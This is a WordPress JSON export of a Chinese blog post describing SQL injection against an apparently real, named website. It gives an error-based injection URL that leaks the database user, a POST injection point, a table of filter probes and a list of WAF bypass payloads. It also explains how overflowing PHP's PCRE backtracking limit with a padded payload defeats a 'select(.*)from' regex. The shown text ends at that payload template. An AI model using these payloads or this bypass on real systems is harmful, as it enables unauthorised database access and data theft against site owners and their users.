{"id":58,"date":"2026-01-30T19:03:00","date_gmt":"2026-01-30T11:03:00","guid":{"rendered":"https:\/\/danchengjie.cn\/?p=58"},"modified":"2026-03-30T21:46:20","modified_gmt":"2026-03-30T13:46:20","slug":"1000000%e6%ad%a3%e5%88%99%e5%9b%9e%e6%ba%af%e7%bb%95%e8%bf%87%e6%ad%a3%e5%88%99%e5%ae%9e%e7%8e%b0sql%e6%b3%a8%e5%85%a5","status":"publish","type":"post","link":"https:\/\/danchengjie.cn\/index.php\/2026\/01\/30\/1000000%e6%ad%a3%e5%88%99%e5%9b%9e%e6%ba%af%e7%bb%95%e8%bf%87%e6%ad%a3%e5%88%99%e5%ae%9e%e7%8e%b0sql%e6%b3%a8%e5%85%a5\/","title":{"rendered":"1000000\u6b63\u5219\u56de\u6eaf\u7ed5\u8fc7\u6b63\u5219\u5b9e\u73b0SQL\u6ce8\u5165"},"content":{"rendered":"\n
\n

<\/p>\n<\/blockquote>\n\n\n\n

<\/a>\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n

<\/a>\u53d1\u73b0GET\u6ce8\u5165\u70b9<\/h3>\n\n\n\n

\u9996\u5148\u5728 news_list.php<\/code> \u53d1\u73b0 GET \u53c2\u6570 cid<\/code> \u5b58\u5728 SQL \u6ce8\u5165\uff1a<\/p>\n\n\n\n

http:\/\/www.cqzszy.com.cn\/news_list.php?cid=11 and updatexml(1,concat(0x7e,user(),0x7e),1)<\/code><\/pre>\n\n\n\n
\u54cd\u5e94\u8fd4\u56de\uff1a<\/p>\n\n\n\n
XPATH syntax error: '~qzy_cqzszy@localhost~'<\/code><\/pre>\n\n\n\n
\u6210\u529f\u83b7\u53d6\u6570\u636e\u5e93\u7528\u6237\u4fe1\u606f\u3002<\/p>\n\n\n\n
\"image-20260302151226510\"\/<\/a><\/figure>\n\n\n\n
\u5206\u6790<\/h3>\n\n\n\n
\u901a\u8fc7\u6d4b\u8bd5\u63a8\u6d4b \u6b63\u5219 \u8fc7\u6ee4\u89c4\u5219\uff1a<\/p>\n\n\n\n
Payload<\/th>\u7ed3\u679c<\/th>\u5206\u6790<\/th><\/tr><\/thead>
select 1<\/code><\/td>\u6210\u529f\u56de\u663e<\/td>select<\/code> \u5355\u72ec\u4e0d\u88ab\u8fc7\u6ee4<\/td><\/tr>
from 1<\/code><\/td>\u62a5\u9519\u56de\u663e<\/td>from<\/code> \u5355\u72ec\u4e0d\u88ab\u8fc7\u6ee4<\/td><\/tr>
select 1 from dual<\/code><\/td>\u7a7a\u767d\u56de\u663e<\/td>select...from<\/code> \u7ec4\u5408\u88ab\u8fc7\u6ee4<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\u7ed3\u8bba<\/strong>\uff1aWAF \u4f7f\u7528\u6b63\u5219<\/mark> select(.*)from<\/code> \u8fc7\u6ee4\uff0c\u5355\u72ec\u7684 select<\/code> \u6216 from<\/code> \u4e0d\u88ab\u62e6\u622a\uff0c\u53ea\u6709\u7ec4\u5408\u65f6\u624d\u89e6\u53d1\u8fc7\u6ee4\u3002<\/p>\n\n\n\n
<\/a>GET\u6ce8\u5165\u7684\u95ee\u9898<\/h3>\n\n\n\n
\u5c1d\u8bd5\u6b63\u5219<\/mark>\u56de\u6eaf\u7ed5\u8fc7\uff0c\u6784\u9020\u8d85\u957f Payload\uff1a<\/p>\n\n\n\n
URL length: 100224\nResponse: 414 Request-URI Too Large<\/code><\/pre>\n\n\n\n
\u95ee\u9898<\/strong>\uff1aURL \u957f\u5ea6\u8d85\u8fc7\u670d\u52a1\u5668\u9650\u5236\uff0c\u65e0\u6cd5\u4f7f\u7528 GET \u8bf7\u6c42\u3002<\/p>\n\n\n\n
<\/a>\u5bfb\u627ePOST\u6ce8\u5165\u70b9<\/h3>\n\n\n\n
\u7531\u4e8e GET \u8bf7\u6c42\u957f\u5ea6\u9650\u5236\uff0c\u9700\u8981\u5bfb\u627e POST \u6ce8\u5165\u70b9\u3002\u5728\u7f51\u7ad9\u529f\u80fd\u9875\u9762\u53d1\u73b0\uff1a<\/p>\n\n\n\n
POST \/order_sell.php HTTP\/1.1\nHost: www.cqzszy.com.cn\nContent-Type: application\/x-www-form-urlencoded\n\np1=1&m1=0&t1=0&...&bs=1'&ac=sell<\/code><\/pre>\n\n\n\n
\u6d4b\u8bd5\u53c2\u6570 bs<\/code> \u5b58\u5728\u6ce8\u5165\uff1a<\/p>\n\n\n\n
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1772425757')' at line 1<\/code><\/pre>\n\n\n\n
\"image-20260302151304796\"\/<\/a><\/figure>\n\n\n\n
<\/a>\u7ed5\u8fc7\u601d\u8def\u63a2\u7d22<\/h2>\n\n\n\n
<\/a>\u5c1d\u8bd5\u7684\u7ed5\u8fc7\u65b9\u6cd5<\/h3>\n\n\n\n
\u5728\u53d1\u73b0\u6b63\u5219<\/mark>\u56de\u6eaf\u4e4b\u524d\uff0c\u5c1d\u8bd5\u4e86\u591a\u79cd\u7ed5\u8fc7\u65b9\u5f0f\uff1a<\/p>\n\n\n\n
\u6362\u884c\u7b26\u6253\u65ad\u6b63\u5219<\/mark><\/strong><\/p>\n\n\n\n
select%0a1%0afrom dual\nselect%0b1%0bfrom dual<\/code><\/pre>\n\n\n\n
\u6ce8\u91ca\u6253\u65ad\u6b63\u5219<\/mark><\/strong><\/p>\n\n\n\n
select\/**\/1\/**\/from\/**\/dual<\/code><\/pre>\n\n\n\n
\u5185\u8054\u6ce8\u91ca<\/strong><\/p>\n\n\n\n
select\/*!*\/1\/*!*\/from\/*!*\/dual\nselect\/*!50000*\/1\/*!50000*\/from\/*!50000*\/dual<\/code><\/pre>\n\n\n\n
\u5927\u5c0f\u5199\u6df7\u5408<\/strong><\/p>\n\n\n\n
SeLeCt 1 FrOm dual<\/code><\/pre>\n\n\n\n
\u53cc\u5199\u7ed5\u8fc7<\/strong><\/p>\n\n\n\n
selselectect 1 frfromom dual<\/code><\/pre>\n\n\n\n
\u7a7a\u5b57\u8282\u622a\u65ad<\/strong><\/p>\n\n\n\n
sel%00ect 1 fr%00om dual<\/code><\/pre>\n\n\n\n
\u9884\u5904\u7406\u8bed\u53e5<\/strong><\/p>\n\n\n\n
set @a=concat('sel','ect 1 fr','om dual');prepare stmt from @a;execute stmt;<\/code><\/pre>\n\n\n\n
\u66ff\u4ee3\u8bed\u53e5<\/strong><\/p>\n\n\n\n
show tables\nhandler table_name open<\/code><\/pre>\n\n\n\n
\u7ed3\u679c<\/strong>\uff1a\u4ee5\u4e0a\u65b9\u6cd5\u5168\u90e8\u5931\u8d25\uff0c\u8fd4\u56de\u7a7a\u767d\u56de\u663e\u3002<\/p>\n\n\n\n
<\/a>\u6b63\u5219<\/mark>\u56de\u6eaf\u539f\u7406<\/h3>\n\n\n\n
PHP PCRE \u9ed8\u8ba4\u56de\u6eaf\u9650\u5236\u4e3a 100 \u4e07\u6b21\u3002\u5f53\u6b63\u5219<\/mark> select(.*)from<\/code> \u5339\u914d\u8d85\u957f\u5b57\u7b26\u4e32\u65f6\uff1a<\/p>\n\n\n\n
    \n
  1. .*<\/code> \u8d2a\u5a6a\u5339\u914d\u5230\u5b57\u7b26\u4e32\u672b\u5c3e<\/li>\n\n\n\n
  2. \u56de\u6eaf\u67e5\u627e from<\/code><\/li>\n\n\n\n
  3. \u56de\u6eaf\u6b21\u6570\u8d85\u8fc7\u9650\u5236\uff0cpreg_match<\/code> \u8fd4\u56de false<\/code><\/li>\n\n\n\n
  4. WAF \u5224\u65ad\u5931\u6548\uff0c\u653e\u884c\u8bf7\u6c42<\/li>\n<\/ol>\n\n\n\n
    <\/a>\u6784\u9020Payload<\/h3>\n\n\n\n
    \u5173\u952e\uff1a\u7528\u6ce8\u91ca \/**\/<\/code> \u5305\u88f9\u5783\u573e\u5b57\u7b26<\/p>\n\n\n\n
    select\/*{100\u4e07\u5b57\u7b26}*\/column from\/*{100\u4e07\u5b57\u7b26}*\/table<\/code><\/pre>\n\n\n\n